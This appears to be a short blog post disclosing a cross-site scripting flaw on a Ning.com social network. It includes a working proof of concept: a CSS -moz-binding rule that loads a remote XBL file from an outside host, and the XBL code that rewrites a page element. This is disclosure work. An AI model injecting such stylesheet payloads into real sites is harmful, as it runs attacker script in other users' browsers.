House Of Hacked Hackers.

Ah well, pun intended. :)

Looks like Ning.com is vulnerable to XSS, and quite a bit at it. I signed up on PDP's new social network called House of Hackers. It seems that Ning let us edit the stylesheet, obviously they never heard of CSS XSS moz-binding attacks otherwise this would not work. These XSS attacks can be launched from a stylesheet.

http://houseofhackers.ning.com/profile/0x0000000

I just created a new CSS rule that fetches the XBL sheet that I borrowed from my good friend Gareth to include it on Ning as an example.

#xg_body {
-moz-binding:url("http://0x000000.com/xbl.xml#xss");
}

Which modifies the page like so:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
document.getElementById('xg_sitename').innerHTML = '<h1>HOUSE OF H4x0rs!!!!!</h1>';
</constructor>
</implementation>
</binding>
</bindings>

There are probably more vectors possible, and hence my problem with such sites as a whole.